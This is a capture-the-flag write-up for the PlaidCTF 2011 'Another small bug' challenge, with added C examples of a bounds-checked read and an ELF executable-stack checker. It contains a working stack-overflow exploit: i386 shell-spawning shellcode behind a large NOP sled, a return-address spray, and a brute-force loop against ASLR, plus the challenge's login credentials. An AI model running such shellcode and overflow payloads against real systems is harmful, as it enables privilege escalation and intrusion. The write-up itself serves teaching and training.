PlaidCTF 2011 #19 – Another small bug (250)

Category: pwnables

This time, let’s attack /opt/pctf/z2/exploitme.
ssh username@a5.amalgamated.biz

Username: z2_1
Password: 29rpJinvpwoI7pzdufQc4h6edzvyh

Summary: buffer overflow, static binary

The binary (cleaned-up IDA decompilation; names made readable, behaviour unchanged):

/* External helpers from the binary; only their return value matters here. */
int log_error(const char *msg);
void myexit(int code);

int main(int argc, char **argv) {
  char buffer[512];   // [sp+1Ch] [bp-204h]: 0x200-byte stack buffer
  unsigned int len;   // [sp+21Ch] [bp-4h]

  if ( argc != 2 )
  {
    printf("%s requires one arguments.\n", argv[0]);
    exit(1);
  }
  len = strtoul(argv[1], NULL, 10);   // no endptr/errno check in the original
  if ( len > 0x1FF )
  {
    // The oversized length only aborts the program if log_error() returns non-zero.
    if ( log_error("[assertion] len < sizeof(buffer)") )
      myexit(2);
  }
  fgets_unlocked(buffer, len, stdin);   // len may exceed 512: stack buffer overflow
  puts(buffer);
  return 0;
}

Hmm, an interesting thing: when the given size is too large, the program exits with code 2 only if log_error() returns non-zero; otherwise it falls through to fgets_unlocked() with the oversized length. Let's check if it works:

z2_1@a5:~$ perl -e 'print "A"x1024;' | /opt/pctf/z2/exploitme 1024
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...
Segmentation fault
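The length check above is the whole problem: the bound is compared correctly, but the abort depends on what a logging function returns. As an added example (not code from the writeup or the challenge binary), here is how the same read looks when the check is enforced unconditionally and the length argument is parsed strictly. The functions parse_len, read_bounded and demo are my own names; the 512-byte buffer size mirrors the challenge, and demo() feeds a constructed 1024-byte line of 'A's through a temporary file.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFER_SIZE 512u   /* same size as the 0x200-byte stack buffer in the challenge */

/* Parse a length argument strictly: the whole string must be a non-negative
 * decimal number. Returns 0 on success, -1 on any parse error. The challenge
 * calls strtoul() without checking endptr or errno, so "12abc" passes silently. */
int parse_len(const char *s, unsigned long *out)
{
    char *end = NULL;
    if (s == NULL || *s == '\0' || s[0] == '-')
        return -1;
    errno = 0;
    unsigned long v = strtoul(s, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return -1;
    *out = v;
    return 0;
}

/* Read one line of at most `requested` bytes (including the NUL) into buf.
 * The requested length is validated against the real buffer size and the
 * request is rejected outright; the challenge only aborts when log_error()
 * happens to return non-zero, so a too-large length still reaches fgets.
 * Returns 0 on success, -1 if the request is rejected or nothing is read. */
int read_bounded(char *buf, size_t bufsz, unsigned long requested, FILE *in)
{
    if (bufsz == 0 || requested == 0 || requested > INT_MAX)
        return -1;
    if (requested > bufsz) {
        fprintf(stderr, "[assertion] len <= sizeof(buffer) failed (%lu > %zu)\n",
                requested, bufsz);
        return -1;                /* reject; never fall through to the read */
    }
    if (fgets(buf, (int)requested, in) == NULL)
        return -1;
    return 0;
}

/* Constructed demonstration: a 1024-byte line of 'A's is offered to
 * read_bounded() first with the challenge's oversized length (1024) and
 * then with a valid one (16). Returns the number of checks that behaved
 * as expected: 3 when everything is correct. */
int demo(void)
{
    char line[1025];
    memset(line, 'A', 1024);
    line[1024] = '\0';
    char buf[BUFFER_SIZE];
    int ok = 0;
    unsigned long n = 0;

    if (parse_len("1024", &n) == 0 && n == 1024) ok++;

    FILE *in = tmpfile();                 /* constructed stdin replacement */
    if (in == NULL) return ok;
    fputs(line, in);
    rewind(in);
    if (read_bounded(buf, sizeof buf, n, in) == -1) ok++;      /* 1024 > 512: rejected */
    if (read_bounded(buf, sizeof buf, 16, in) == 0 && strlen(buf) == 15) ok++;
    fclose(in);
    return ok;
}
```

Note that the original comparison `len > 0x1FF` is itself fine for a 512-byte buffer, since fgets reads at most len-1 characters plus the terminating NUL; what matters is that the rejection does not depend on a side channel such as a logger's return value.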

Yes, the buffer is overflowed. Let's check for NX:

smallbug2 $ execstack -q binary
X binary
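execstack decides "X" by looking at the PT_GNU_STACK program header: if its flags include PF_X, the loader maps the stack executable. As an added example (not from the writeup), here is a small C checker that performs the same test on an in-memory ELF64 image, plus a constructed sample image to exercise it. The names gnu_stack_flags, make_sample_elf and check_sample are my own; the checker handles ELF64 only, so the 32-bit challenge binary would need the Elf32_* structures, and a real file would be read into memory first.

```c
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Verdicts returned by gnu_stack_flags() */
enum { STACK_NOEXEC = 0, STACK_EXEC = 1, STACK_NO_PHDR = -1, STACK_BAD_ELF = -2 };

/* Inspect an in-memory ELF64 image and report whether its PT_GNU_STACK
 * program header requests an executable stack (PF_X set). A missing
 * PT_GNU_STACK header is reported separately, because older toolchains
 * and loaders treat that case as executable as well. */
int gnu_stack_flags(const unsigned char *img, size_t len)
{
    Elf64_Ehdr eh;
    if (len < sizeof eh) return STACK_BAD_ELF;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 || eh.e_ident[EI_CLASS] != ELFCLASS64)
        return STACK_BAD_ELF;
    if (eh.e_phentsize != sizeof(Elf64_Phdr)) return STACK_BAD_ELF;

    for (uint16_t i = 0; i < eh.e_phnum; i++) {
        uint64_t off = eh.e_phoff + (uint64_t)i * eh.e_phentsize;
        if (off > len || len - off < sizeof(Elf64_Phdr))
            return STACK_BAD_ELF;                    /* truncated program header table */
        Elf64_Phdr ph;
        memcpy(&ph, img + off, sizeof ph);
        if (ph.p_type == PT_GNU_STACK)
            return (ph.p_flags & PF_X) ? STACK_EXEC : STACK_NOEXEC;
    }
    return STACK_NO_PHDR;
}

/* Constructed sample: a minimal ELF64 header followed by one program header.
 * With with_stack_phdr set it is a PT_GNU_STACK entry carrying `flags`;
 * otherwise it is PT_NULL, simulating a binary with no stack header.
 * `out` needs sizeof(Elf64_Ehdr)+sizeof(Elf64_Phdr) bytes; returns the length. */
size_t make_sample_elf(unsigned char *out, uint32_t flags, int with_stack_phdr)
{
    Elf64_Ehdr eh;
    memset(&eh, 0, sizeof eh);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS]   = ELFCLASS64;
    eh.e_ident[EI_DATA]    = ELFDATA2LSB;
    eh.e_ident[EI_VERSION] = EV_CURRENT;
    eh.e_type      = ET_EXEC;
    eh.e_machine   = EM_X86_64;
    eh.e_version   = EV_CURRENT;
    eh.e_ehsize    = sizeof eh;
    eh.e_phoff     = sizeof eh;
    eh.e_phentsize = sizeof(Elf64_Phdr);
    eh.e_phnum     = 1;

    Elf64_Phdr ph;
    memset(&ph, 0, sizeof ph);
    ph.p_type  = with_stack_phdr ? PT_GNU_STACK : PT_NULL;
    ph.p_flags = flags;

    memcpy(out, &eh, sizeof eh);
    memcpy(out + sizeof eh, &ph, sizeof ph);
    return sizeof eh + sizeof ph;
}

/* Build a constructed image with the given flags and return the verdict. */
int check_sample(uint32_t flags, int with_stack_phdr)
{
    unsigned char img[sizeof(Elf64_Ehdr) + sizeof(Elf64_Phdr)];
    size_t n = make_sample_elf(img, flags, with_stack_phdr);
    return gnu_stack_flags(img, n);
}

int main(void)
{
    printf("RWX stack  -> %d (1 = executable, like execstack's X)\n",
           check_sample(PF_R | PF_W | PF_X, 1));
    printf("RW stack   -> %d (0 = NX, like execstack's -)\n",
           check_sample(PF_R | PF_W, 1));
    printf("no header  -> %d (-1 = no PT_GNU_STACK)\n", check_sample(0, 0));
    return 0;
}
```

The fix on the build side is the same thing in reverse: link with `-z noexecstack` (or clear the flag with `execstack -c`) so the header carries RW only, which is what a hardened build of this challenge would show.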

Cool, the NX bit is not set. Unfortunately ASLR is present, but we can build a huge NOP sled and make a few tries:

z2_1@a5:~$ export SC="`perl -e 'print "\x90"x64000 .
"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58
\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f
\x62\x69\x89\xe3\x89\xd1\xcd\x80";'`"

Get one of the possible stack addresses:

z2_1@a5:~$ perl -e 'print "A"x1024;' >input
z2_1@a5:~$ gdb /opt/pctf/z2/exploitme
(gdb) r 1024 <input
(gdb) p/x $esp+20000
$1 = 0xbfdea7b0

Run!

z2_1@a5:~$ while [ 0 ]; do (perl -e 'print "\xb0\xa7\xde\xbf"x256;';
echo; cat) | /opt/pctf/z2/exploitme 1024; done

After ~20 segfaults we get a shell:

id
uid=2000(z2_1) gid=1001(z2users) egid=1003(z2key) groups=1001(z2users)
cat /opt/pctf/z2/key
This is the key: EASTEREGGHUNTS_ARE_FUN

The flag: EASTEREGGHUNTS_ARE_FUN
